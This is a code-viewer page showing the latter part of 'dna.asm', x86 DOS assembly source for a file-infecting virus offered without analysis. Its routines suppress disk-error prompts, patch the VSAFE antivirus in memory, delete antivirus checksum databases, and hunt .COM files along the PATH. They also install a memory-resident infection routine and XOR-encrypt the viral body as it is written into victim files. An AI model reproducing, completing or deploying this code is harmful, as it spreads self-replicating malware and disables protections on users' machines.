📄 dna.asm
字号:
INT 21 ;Call DOS.
ADD DX,1Eh ;Filename pointer in DTA.
MOV WORD PTR[BP+OFFSET NP],DX;Put in name pointer.
RET ;Return to caller.
;-----------------------------------------------------------------------------
INT24: MOV AX,3524h ;Get int 24 handler.
INT 21h ;into [ES:BX].
MOV WORD PTR[BP+OLDINT],BX ;Save it.
MOV WORD PTR[BP+OLDINT+2],ES;
MOV AH,25h ;Set new int 24 handler.
LEA DX,[BP+OFFSET NEWINT] ;DS:DX->new handler.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RINT24: PUSH DS ;Save data segment.
MOV AX,2524h ;Restore int 24 handler
LDS DX,[BP+OFFSET OLDINT] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;---------------------------------------------------------------------------
RINTD0: PUSH DS ;Save data segment.
MOV AX,25D0h ;Restore int D0 handler
LDS DX,[BP+OFFSET INTD0] ;to original.
INT 21h ;Call DOS.
POP DS ;Restore data segment.
RET ;Return to caller.
;-----------------------------------------------------------------------------
VSAFE: MOV AX,3516h ;Get interrupt vector INT 16.
INT 21h ;(Now we know in wich segment it is.)
ADD BX,0364h ;Here we find a jump that we'll change.
CMP WORD PTR[ES:BX],0945h ;Is it THE jump?
JNE OK_9 ;No, already modified or not resident.
MOV WORD PTR[ES:BX],086Dh ;Yes, modify it.
OK_9: RET ;Return to caller. No Vsafe.
;-----------------------------------------------------------------------------
FIND1: MOV BYTE PTR[BP+OFFSET VAL_2],0FFh; This routine is derived from
MOV BX,01h ; the VIENNA virus. (Why invent the
FIND2: PUSH ES ; wheel twice?)
PUSH DS ;- Save registers.
MOV ES,DS:2CH ;
MOV DI,0 ;ES:DI points to environment.
FPATH: LEA SI,[BP+OFFSET PATH] ;Point to "PATH=" string in data area.
LODSB ;
MOV CX,OFFSET 8000H ;Environment can be 32768 bytes long.
REPNZ SCASB ;Search for first character.
MOV CX,4 ;Check if path
LOOP_2: LODSB ;is complete.
SCASB ;
JNZ FPATH ;If not all there, abort & start over.
LOOP LOOP_2 ;Loop to check the next character.
XCHG SI,DI ;Exchange registers.
MOV CL,BYTE PTR[BP+OFFSET VAL_2];Random value in CL.
PUSH ES ;\
POP DS ;-) Get DS, ES on address.
POP ES ;/
OK_14: LEA DI,[BP+OFFSET NEW_DTA+50];Offset address path.
OK_10: MOVSB ;Get name in path.
MOV AL,[SI] ;
CMP AL,0 ;Is it at the end?
JE OK_11 ;Yes, replicate.
CMP AL,3Bh ;Is it ';'?
JNE OK_10 ;Nope, next letter.
INC SI ;For next loop. ';'=';'+1.
INC BX ;
LOOP OK_14 ;Loop until random value = 0.
OK_11: POP DS ;Restore data segment.
MOV AL,0 ;Place space after the directory.
MOV [DI],AL ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
DELSTUF:MOV BX,01h ;Set counter
PUSH BX ;and push it.
LEA DX,[BP+OFFSET MICRO] ;Is there a CHKLIST.MS file?
JMP INTER ;Check it out.
SECOND: LEA DX,[BP+OFFSET TBAV] ;Is there a ANTI-VIR.DAT file?
INC BX ;Increase counter
PUSH BX ;and push it.
JMP INTER ;Check it out.
THIRD: LEA DX,[BP+OFFSET CENTRAL] ;Is there a CHKLIST.CPS file?
INC BX ;Increase counter
PUSH BX ;and push it
INTER: MOV AH,4Eh ;Find first matching entry.
MOV CX,110b ;Search all attributes.
INT 21h ;Call DOS.
JC NODEL ;No match, find next.
CALL ATTRIB ;Clear attributes.
MOV AH,41h ;Delete file.
INT 21h ;Call DOS.
NODEL: POP BX ;Pop counter.
CMP BX,01 ;Had the first one?
JE SECOND ;Yes, do the second.
CMP BX,02 ;Was it the second?
JE THIRD ;Yes, do the third.
RET ;Finished, return to caller.
;-----------------------------------------------------------------------------
CHDRIVE:MOV CX,0FFFFh ;Clear CX.
MOV BL,'A'-1 ;AH=40
OK_15: INC BL ;AH=41='A'
INC CX ;CX=1
CMP BL,BYTE PTR[BP+OFFSET NEW_DTA+50];New drive letter.
JNE OK_15 ;Not the same, go again.
MOV DL,CL ;Calculated the new drive code.
MOV AH,0Eh ;Give up new drive code.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RTIME: MOV AX,5701h ;Restore time & date.
MOV CX,WORD PTR[BP+OFFSET TIME];Old time.
MOV DX,WORD PTR[BP+OFFSET DATE];Old date.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
STIME: MOV AX,5700h ;Get file date & time.
MOV BX,[BP+OFFSET HANDLE] ;File Handle.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET TIME],CX;Store time.
MOV WORD PTR[BP+OFFSET DATE],DX;Store date.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BPOINT: XOR DX,DX ;Zero register.
MOV AX,4202h ;Move file pointer to top.
XOR CX,CX ;Zero register.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
ATTRIB: MOV DX,WORD PTR[BP+OFFSET NP];Offset in DTA.
MOV AX,4300h ;Ask file attributes.
INT 21h ;Call DOS.
LEA BX,[BP+OFFSET ATTR] ;Save address for old attributes.
MOV [BX],CX ;Save it.
XOR CX,CX ;Clear file attributes.
MOV AX,4301h ;Write file attributes.
INT 21h ;Call DOS.
JNC OK ;No error, proceed.
CALL EXIT ;Oh Oh, error occured. Quit.
OK: RET ;Return to caller.
;-----------------------------------------------------------------------------
RATTRIB:LEA DX,[BP+OFFSET NEWNAM] ;Offset file specification.(name.TXT)
LEA BX,[BP+OFFSET ATTR] ;Offset address old attributes.
MOV CX,[BX] ;Into CX.
MOV AX,4301h ;Write old values back.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
GODIR: LEA DX,[BP+OFFSET NEW_DTA+52];Offset directory spec.
MOV AH,3Bh ;Goto the directory.
INT 21h ;Call DOS.
RET ;Return to caller.
;-----------------------------------------------------------------------------
RANDOM: CALL CHKTIME ;Get system time.
MOV CX,0 ;Figure this out by yourself.
MOV AX,100d ;It is a random generator with
OK_19: INC CX ;two variable inputs.
SUB AX,BX ;A: How many dir's in the path.
CMP AX,01d ;B: Random system time.
JGE OK_19 ;With this values, we create a
XOR BX,BX ;random value between 1 and A.
OK_20: INC BX ;
SUB DL,CL ;
CMP DL,01d ;
JGE OK_20 ;
MOV BYTE PTR[BP+OFFSET VAL_2],BL;Save value.
RET ;Return to caller.
;-----------------------------------------------------------------------------
BEGIN1: PUSH SP ;
POP BX ;Everything is related to BP.
MOV BP,WORD PTR[BX] ;
SUB BP,0145h ;In first run BP=0
RET ;
;-----------------------------------------------------------------------------
NEWINT: MOV AL,03h ;New INT 24.
IRET ;No more write protect errors!
;-----------------------------------------------------------------------------
INSTSR2:PUSH ES ;-Save registers.
PUSH DS ;/
MOV AX,0DEDEh ;Resident check.
INT 21h ;Call DOS.
CMP AH,41h ;\
JNE NOBRO ;-Little Brother virus in memory?
CALL EXIT4 ;If resisent, do nothing.
NOBRO: MOV AX,3D3Dh ;Resident check.
INT 21h ;Call DOS.
CMP AX,1111h ;\
JNE NOGETP ;-Getpass! virus resident ?.
CALL EXIT4 ;If resident, quit.
NOGETP: MOV AX,35D0h ;Save old interrupt vector INT D0.
INT 21h ;Call DOS.
MOV WORD PTR[BP+OFFSET INTD0],BX
MOV WORD PTR[BP+OFFSET INTD0+2],ES
MOV AX,0044h ;
MOV ES,AX ;
MOV DI,0100h ;
LEA SI,[BP+OFFSET INFECT] ;Offset address infection routine.
MOV CX,TSR2LEN ;Length to install.
REP MOVSB ;Install it.
PUSH ES ;
POP DS ;
MOV AX,25D0h ;Give up new INT D0 vector.
MOV DX,0100h ;
INT 21h ;Call DOS.
POP DS ;
POP ES ;
RET ;Return to caller.
;-----------------------------------------------------------------------------
PATH DB 'PATH=' ;Used to find environment.
SPEC DB '*.COM',0 ;File search specification.
TXT DB '.TXT',0 ;Rename file specification.
OUTPUT DB 0 ;Output byte to printer.
TXTPOI DW 0 ;Pointer in specification.
MARK1 DB 0 ;Used for infection check.
VAL_2 DB 0 ;Random value for directory switching.
OLDRV DB 0 ;Old drive code.
BEGIN2 DW 0 ;
NWJMP1 DB 0EBh,0 ;
FLAGT DB 0 ;
COMMND DB 'COMM',0 ;
MICRO DB 'CHKLIST.MS',0 ;- Files to be deleted.
CENTRAL DB 'CHKLIST.CPS',0 ;/
TBAV DB 'ANTI-VIR.DAT',0 ;/
VIRNAME DB ' Wrong copied DNA = Evolution '
DB ' I am Life.'
DB ' Greetings ,ThE wEiRd GeNiUs '
OLD_DTA DW 0 ;Old DTA addres.
HANDLE DW 0 ;File handle.
COMSIGN DB 0 ;Command.com flag
TIME DB 2 DUP (?) ;File time.
DATE DB 2 DUP (?) ;File date.
ATTR DB 1 DUP (?),0 ;Attributes.
INTD0 DW 0,0 ;
NEWJMP DB 0E9h,0,0 ;Jump replacement.
ORIGNL DB 0CDh,020h,090h ;Original instrucitons.
DEXIT DB 0CDh,020h,090h ;Dummy exit instructions.
NEWNAM DB 0Dh DUP (?) ;New file name.
OLDINT DW 0 ;Old INT 24 vector.
NP DW ? ;New DTA address.
;-----------------------------------------------------------------------------
INFECT: PUSH BX ;Save file handle.
PUSH DX ;Save encryption key.
PUSH BX ;Save file handle.
CALL DNCRYPT ;Encrypt the virus code.
POP BX ;Restore file handle.
LEA DX,[BP+OFFSET VSTART] ;Begin here.
MOV CX,VIRLEN ;Write this many Bytes.
MOV AH,40h ;Write to file.
INT 21h ;Call DOS.
POP DX ;Restore encryption value.
CALL DNCRYPT ;Fix up the mess.
POP BX ;Restore file handle.
DUMMY: IRET ;Return to caller.
;-----------------------------------------------------------------------------
DNCRYPT:LEA BX,[BP+OFFSET CSTART] ;De/en-crypt from here.
MOV DH,DL ;
MOV CX,CRYPTLEN ;Set counter.
Y_LOOP: XOR [BX],DL ;Xor the code on address BX.
SUB DL,DH ;-To change form of scrambled code.
SUB DH,02Eh ;/
INC BX ;Increase address.
LOOP Y_LOOP ;Repeat until done.
NOTENC: RET ;Return to caller.
;-----------------------------------------------------------------------------
BUFFER: DB 64 DUP (?) ;Here we store directory info.
;-----------------------------------------------------------------------------
NEW_DTA: ;Here we put the DTA copy.
;-----------------------------------------------------------------------------
CODE ENDS
END START
;=============================================================================
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -